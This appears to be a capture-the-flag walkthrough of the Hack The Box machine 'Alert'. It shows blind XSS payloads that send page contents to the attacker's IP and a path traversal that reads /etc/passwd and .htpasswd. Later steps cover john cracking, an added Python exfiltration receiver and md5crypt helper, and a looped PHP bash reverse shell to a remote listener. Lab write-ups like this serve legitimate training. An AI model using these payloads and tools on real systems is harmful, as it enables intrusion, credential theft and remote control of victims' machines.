Alert (HTB)


Intro

Hello my fellow hackers, I hope everyone is doing great. Today we have a new Hack The Box machine called Alert. Without further ado, let's get right into it.


Enumeration.

Port scanning.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
|   256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).

A classic HTTP and SSH type of machine. Let's see what the web page looks like.

Enumerate HTTP.

When I first got to the machine I did not know what the web app was about, so I checked the About Us page.

And I noticed this.

It says that any feedback we send will be checked by the administrator, so I am thinking blind XSS. Let's test that out.

I made a simple payload that fetches an image from my machine.

After starting a Python web server with:

python3 -m http.server <PORT_NUMBER>

the callback hit my server, so it is indeed vulnerable to blind XSS.

More investigation on XSS.

After discovering that, I looked more into the markdown files and found a useful blog,

which proved something to me. Look at this.

<h1>Hello World</h1>



<img src="" onerror="fetch('/messages').then(response => response.text()).then(data => { new Image().src='http://10.10.16.20:8000/log.php?output=' + encodeURIComponent(data); })" />
  • This markdown file has a malicious image in it which attempts to read the content of /messages, a path on the web app which we are not authorized to view.

So I will try to use the visualizer to view the content of that path, and if that does not work I will try it through the administrator XSS.

If we upload the file to the visualizer we still get Forbidden. Now let's test via the feedback form.

I used this payload in both cases.

<img src="" onerror="fetch('/messages').then(response => response.text()).then(data => { new Image().src='http://10.10.16.20:8000/log.php?output=' + encodeURIComponent(data); })" />

As you can see, when we use it via the feedback form we do not get Forbidden, so I think this is our way in. But I am not sure what to do next; let's dig more.

Shell as Albert.

I figured it out, MAN.

I am not sure if I mentioned this, but we are able to execute JS code in the uploaded md file as well (it allows XSS too), so we upload the following payload.

<script>
fetch("http://alert.htb/messages.php")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.4:8000/?file_content=" + encodeURIComponent(data));
  });
</script>

Upload this payload to the server, then grab the share link from the button in the bottom right corner. After you do so, head back to the Contact Us page and submit the following.

<img src="YOUR SHARED URL" />

Put your link there, and do not forget to start your server with Python.

python3 -m http.server <PORT>

By doing so you will receive URL-encoded data like so.

Decoding this URL-encoded data shows us something important. You can use any website to decode it; I love to use Burp Suite.
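Instead of reading the URL-encoded blob off the python http.server access log and pasting it into a decoder, the callback can be received by a tiny purpose-built server. The following Python is an added example (not code from the writeup or from the Alert machine): it listens like python3 -m http.server does, recognises the file_content and output query parameters that the payloads above use, URL-decodes the value and saves it to a loot directory, and logs bare image beacons (the blind XSS test from the feedback form) as proof of execution. The port, the loot directory name and the sample requests are assumptions; the same receiver works for the path traversal requests later on, since those reuse the file_content parameter.

```python
"""Exfil receiver for the blind XSS callbacks used in this writeup.
Added example, not part of the original post: it stands in for
`python3 -m http.server` and stores each ?file_content=/?output= hit already
URL-decoded, so nothing has to be pasted into a decoder by hand."""
import os
import sys
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

# Query parameter names the payloads on this page use to carry stolen data.
EXFIL_PARAMS = ("file_content", "output")
LOOT_DIR = "loot"  # assumption: directory where decoded captures are written


def parse_exfil(request_path):
    """Return (param_name, decoded_text) for an exfil hit, or None when the
    request carries none of the expected parameters (a plain image beacon)."""
    query = urlsplit(request_path).query
    # parse_qs percent-decodes values, which reverses encodeURIComponent();
    # keep_blank_values so an empty response (e.g. a 403 page) is still recorded.
    params = parse_qs(query, keep_blank_values=True)
    for name in EXFIL_PARAMS:
        if name in params:
            return name, params[name][0]
    return None


def save_loot(name, text, loot_dir=LOOT_DIR):
    """Write one decoded capture to loot_dir and return the file path."""
    os.makedirs(loot_dir, exist_ok=True)
    path = os.path.join(loot_dir, f"{int(time.time() * 1000)}_{name}.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)
    return path


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        hit = parse_exfil(self.path)
        if hit is None:
            # A bare hit such as <img src="http://attacker/x.png"> carries no
            # data: the request itself is the proof that the blind XSS fired.
            print(f"[beacon] {self.client_address[0]} {self.path}")
        else:
            name, text = hit
            path = save_loot(name, text)
            print(f"[loot] {self.client_address[0]} {len(text)} bytes -> {path}")
            print(text)
        # 204 keeps both new Image().src and fetch() quiet in the victim browser.
        self.send_response(204)
        self.end_headers()

    def log_message(self, *_args):
        pass  # suppress the default access-log lines; we print our own


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8000
    print(f"listening on 0.0.0.0:{port}")
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Run it as python3 exfil_server.py 8000 on the attacking machine and point the payload's IP and port at it; each successful fetch lands as a readable file under loot/ while a beacon-only hit is just printed.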

As you can see, there is an optional GET parameter, file. Let's see what we can do with that.

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../../../../../../../../../etc/passwd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.4:8000/?file_content=" + encodeURIComponent(data));
  });
</script>

By adding the file parameter I was able to exploit path traversal in the same way.

Great. Now that we have path traversal in hand, maybe we can use it to grab an SSH key? No luck.

So I tried to find anything else, and I found this.

We have a subdomain!!!

It requires creds, so let's see if we can use the path traversal to find them.

With a simple search we can find that Apache uses a well-known file for its virtual hosts.

/etc/apache2/sites-enabled/000-default.conf

Let's see what we have there.

I also attempted to get the config file, but there was nothing useful in it.

And indeed it was there.

It appears that it uses an .htpasswd file, which should contain the creds we are looking for.

Using the same payload we can get the content of that file, which is a hash.

It's time to crack it, and what tool is better than THE GOAT, john?

john --wordlist=../../Downloads/rockyou.txt --format=md5crypt-long hash

YEAH BABY.
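Before pointing john at an .htpasswd entry it is worth confirming which scheme the entry actually uses, because Apache can store {SHA}, $apr1$, $1$, bcrypt or classic crypt(3) hashes and each needs a different john or hashcat format. The following Python is an added example (not from the writeup): it parses a user:hash line, maps the prefix to the cracker format, and includes a pure-Python md5crypt so that a single guess against a $1$ or $apr1$ entry can be verified offline without john. The sample file is constructed: alice's hash is the md5crypt test vector from the PHP crypt() manual (password rasmuslerdorf), bob's is the {SHA} form of "password", and the user names are made up.

```python
"""Triage an .htpasswd entry before cracking it (added example, not part of
the original writeup): identify the scheme, print the john/hashcat format,
and check a guess offline with a pure-Python md5crypt."""
import base64
import hashlib

# hash prefix -> (description, john --format, hashcat -m)
SCHEMES = {
    "$apr1$": ("Apache apr1 MD5", "md5crypt", 1600),
    "$1$": ("md5crypt", "md5crypt", 500),
    "$2y$": ("bcrypt", "bcrypt", 3200),
    "{SHA}": ("SHA-1 base64", "Raw-SHA1", 101),  # hashcat 101 = nsldap
}
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def parse_htpasswd_line(line):
    """Split 'user:hash' and classify the hash; returns a dict."""
    user, sep, hashval = line.strip().partition(":")
    if not sep:
        raise ValueError(f"not a user:hash line: {line!r}")
    for prefix, (desc, john, hashcat) in SCHEMES.items():
        if hashval.startswith(prefix):
            return {"user": user, "hash": hashval, "scheme": desc,
                    "john": john, "hashcat": hashcat}
    if len(hashval) == 13:  # no prefix, 13 chars: classic crypt(3) DES
        return {"user": user, "hash": hashval, "scheme": "crypt(3) DES",
                "john": "descrypt", "hashcat": 1500}
    return {"user": user, "hash": hashval, "scheme": "unknown", "john": None, "hashcat": None}


def _to64(value, count):
    # md5crypt's own base64: 6 bits at a time, least significant first
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt, magic=b"$1$"):
    """FreeBSD md5crypt over bytes. magic=b'$apr1$' gives the Apache variant,
    which differs only in that prefix. Returns the full '$1$salt$hash'."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    plen = len(password)
    while plen > 0:
        ctx.update(alt[:min(16, plen)])
        plen -= 16
    i = len(password)
    while i:  # one byte per bit of len(password): NUL for 1, pw[0] for 0
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # the stretching loop that makes md5crypt slow
        c = hashlib.md5(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    triples = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in triples) + _to64(final[11], 2)
    return (magic + salt + b"$").decode() + out


def verify(hashval, candidate):
    """Check one candidate against a $1$ / $apr1$ / {SHA} entry."""
    pw = candidate.encode()
    if hashval.startswith(("$1$", "$apr1$")):
        _, magic, salt, _ = hashval.split("$", 3)  # assumes no '$' in the salt
        return md5crypt(pw, salt.encode(), f"${magic}$".encode()) == hashval
    if hashval.startswith("{SHA}"):
        return base64.b64encode(hashlib.sha1(pw).digest()).decode() == hashval[5:]
    raise NotImplementedError("hand this scheme to john/hashcat")


def crack(hashval, words):
    """Return the first word that verifies, else None."""
    return next((w for w in words if verify(hashval, w)), None)


# Constructed sample: alice's entry is the md5crypt vector from the PHP crypt()
# manual (password "rasmuslerdorf"), bob's is {SHA} of "password". Names are made up.
SAMPLE_HTPASSWD = """\
alice:$1$rasmusle$rISCgZzpwk3UhDidwXvin0
bob:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
"""

if __name__ == "__main__":
    guesses = ["letmein", "password", "rasmuslerdorf"]
    for line in SAMPLE_HTPASSWD.splitlines():
        e = parse_htpasswd_line(line)
        print(f"{e['user']}: {e['scheme']} (john --format={e['john']}, hashcat -m {e['hashcat']}) cracked={crack(e['hash'], guesses)}")
```

john's md5crypt format handles both $1$ and $apr1$ entries; md5crypt-long, the one used above, is the variant for passwords longer than 15 characters. The pure-Python routine is for confirming a single guess or a short custom list, not a replacement for john against rockyou.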

Now we do not care about the other virtual host; we can use these creds to log in via SSH.

ssh albert@alert.htb

Shell as Root.

  • The root process was very simple.

  • First we check our permissions; we do not have root access.

  • BUUUUUT using the id command we can see that we are part of another group.

  • Using the find command we can find the files that belong to this group.

  • At first I took a look at the processes and found that the root user is responsible for running this monitor website, specifically its configuration file.

  • So I tried to modify it, but every time I did so I found that it returned to its original content, so I investigated why that was the case????

which is a command line utility that allows you to monitor file and directory changes in real time.

  • So I thought that there may be something about this which causes the file to return to its default content.

  • The first idea that came to my mind was a race condition, meaning I would set up a while loop that keeps writing a PHP reverse shell into that file, and hopefully the root user would execute the file while my reverse shell is in it.

  • Which was correct.

while true; do echo "<?php define('PATH', '/opt/website-monitor'); exec('/bin/bash -c \'bash -i >& /dev/tcp/10.10.16.38/4444 0>&1\''); ?>" > configuration.php; done

I used this command in the terminal, and I also set up an nc listener on port 4444 to catch the reverse shell.

nc -nlvp 4444

And we get it.
